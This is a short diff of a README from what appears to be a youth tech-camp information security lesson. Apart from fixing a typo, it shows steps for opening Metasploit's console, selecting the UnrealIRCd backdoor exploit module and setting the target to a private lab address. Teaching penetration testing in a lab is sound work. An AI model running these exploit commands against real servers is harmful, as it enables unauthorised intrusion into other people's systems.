RRC-ACE-Outreach/TechCamp/TechCamp - Information Security/README.md

 msf6 >
 ```

-This is our msfconsole prompt, where we lauch our attacks from.
+This is our msfconsole prompt, where we launch our attacks from.
 If we are going to attack the Unreal IRC server, we need to configure our attack.
 This often require research and trial and error, however, we will focus on results today.
 Type in the following:
 ```
 use exploit/unix/irc/unreal_ircd_3281_backdoor
 set RHOST 192.168.56.101